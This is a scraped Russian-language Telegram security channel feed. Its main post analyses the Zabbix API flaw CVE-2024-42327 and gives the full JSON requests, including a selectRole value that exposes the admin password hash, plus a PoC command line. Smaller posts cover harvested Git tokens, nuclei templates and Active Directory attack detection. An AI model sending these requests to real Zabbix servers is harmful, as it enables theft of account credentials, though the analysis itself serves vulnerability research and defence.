Forwarded from Укротитель змей
CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
После этого сервер возвращает токен
Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
В ответе возвращаются данные с хэшированным паролем
Чтобы провернуть эту схему, нужно иметь доступ к
И учетка с минимальными правами, которая может дернуть метод
Уязвимые версии:
PoC
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага. CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
user.login используется для получения токена сессии, необходимого для выполнения запросов.{
"jsonrpc": "2.0",
"method": "user.login",
"params": {
"username": "guest",
"password": "guest_password"
},
"id": 1
}После этого сервер возвращает токен
{
"jsonrpc": "2.0",
"result": "a43530e0eff1f1ce828cc04dca95eb14",
"id": 1
}Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
user.get, перебирай ID пользователей{
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid, u.passwd", "roleid"],
"userids": "1"
},
"auth": "a43530e0eff1f1ce828cc04dca95eb14",
"id": 1
}В ответе возвращаются данные с хэшированным паролем
{
"jsonrpc": "2.0",
"result": [
{
"userid": "1",
"username": "Admin",
"name": "Zabbix",
"surname": "Administrator",
"passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
}
],
"id": 1
}Чтобы провернуть эту схему, нужно иметь доступ к
JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.http://zabbix/api_jsonrpc.php
И учетка с минимальными правами, которая может дернуть метод
user.login.Уязвимые версии:
Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.
cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123
PoC
❤2👍1🔥1
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Proxy Bar
Рубрика
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
.git leaks*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
Gi7w0rm , добряки )))❤2👍1
Forwarded from Похек
#nuclei
Теперь nuclei стал немного полезнее для инфраструктурщиков, которые работают по AD. В последнем апдейте добавили очень много шаблонов связанных с low-hangling fruite в AD, к примеру smb v1/not sign, winrm, UAC, LSA и т.д.
Сейчас вендоры как сделают git pull и будут продавать сканирование внутрянки под соусом своей экспертизы)) Но это я так, шутки шучу, вы же знаете
А если серьезно, то поможет на очень большом скоупе, в остальных случаях: руки + nmap, всегда хватало
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Системные логи
Пока решал лабы на портсвиггере наткнулся на интересный перевод книги Гарета Хейса: "Javascript for hackers. Learn to think like a hacker" 🌎
😈 Гарет Хейс исследователь Portswigger и создатель такого расширения как Hackvertor
Советую к прочтению - Ссылка на перевод книги
☺ Для тех кто любит читать на Английском приложил оригинал
Советую к прочтению - Ссылка на перевод книги
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем хак 👾
Хочу поделиться с вами отличной новостью! Мой знакомый, талантливый багхантер, запустил свой собственный канал, где будет делиться своим опытом и знаниями в области вебчика! 🔍
Сверху репостнул с его канала перевод книги, которую, скорее всего, вы бы не нашли. Это отличная возможность углубить свои знания! 📚
Если вы интересуетесь кибербезопасностью, то обязательно загляните на его канал:
https://t.me/sytem10gs 👈🏻
И, кстати, это не реклама — мне не заплатили ни копейки! Просто хочу поддержать интересный проект.
Подписывайтесь и учитесь! 🦈
Хочу поделиться с вами отличной новостью! Мой знакомый, талантливый багхантер, запустил свой собственный канал, где будет делиться своим опытом и знаниями в области вебчика! 🔍
Сверху репостнул с его канала перевод книги, которую, скорее всего, вы бы не нашли. Это отличная возможность углубить свои знания! 📚
Если вы интересуетесь кибербезопасностью, то обязательно загляните на его канал:
https://t.me/sytem10gs 👈🏻
И, кстати, это не реклама — мне не заплатили ни копейки! Просто хочу поддержать интересный проект.
Подписывайтесь и учитесь! 🦈
Telegram
Системные логи
Пью пиво, тыкаю вебчик
❤2⚡1☃1👏1
www.opennet.ru
Компания Mozilla представила новый логотип и фирменный стиль
Компания Mozilla представила новый логотип и элементы бренда, такие как фирменные цвета, элементы стиля и шрифты. Кроме того, изменено оформление сайта mozilla.org. Отмечается, что новая брендовая стратегия отражает роль Mozilla как лидера в области цифровых…
🔗Ссылка:
https://opennet.ru/62346/
https://opennet.ru/62346/
Fsecurity | HH pinned «Всем хак 👾 Хочу поделиться с вами отличной новостью! Мой знакомый, талантливый багхантер, запустил свой собственный канал, где будет делиться своим опытом и знаниями в области вебчика! 🔍 Сверху репостнул с его канала перевод книги, которую, скорее всего…»
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
Представьте ситуацию, когда вы видите множественные события 4662 с характерными для DCSync GUID из-под учётной записи доменного администратора.
Вы начинаете раскручивать цепочку, фиксируете аутентификацию по Kerberos под УЗ этого администратора, но не находите ни одного запроса билета от его имени.
И тут ваше внимание привлекает запрос TGT и ST с типом шифрования 0x12 (AES256) на контроллере домена от, казалось бы, от самого контроллера домена...
О такой цепочке мы и поговорим подробнее в этой статье.
Речь пойдет о двух небезызвестных уязвимостях, позволяющих
Посмотрим на атаку глазами красной команды и научимся искать артефакты, побыв на стороне защиты
#AD
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Кто обзывается — тот SAM так называется
SAMAccountName spoofing — знакомство с CVE-2021-42278 и CVE-2021-42287
www.opennet.ru
Ядро Linux 6.12 отнесено к категории выпусков с длительным сроком поддержки
Ядру Linux 6.12 присвоен статус ветки с длительным сроком поддержки. Обновления для ветки 6.12 будут выпускаться как минимум до декабря 2026 года, но не исключено, что, как и в случае с прошлыми LTS-ветками, время сопровождения будет продлено до шести лет.…
🔗Ссылка:
https://opennet.ru/62355/
https://opennet.ru/62355/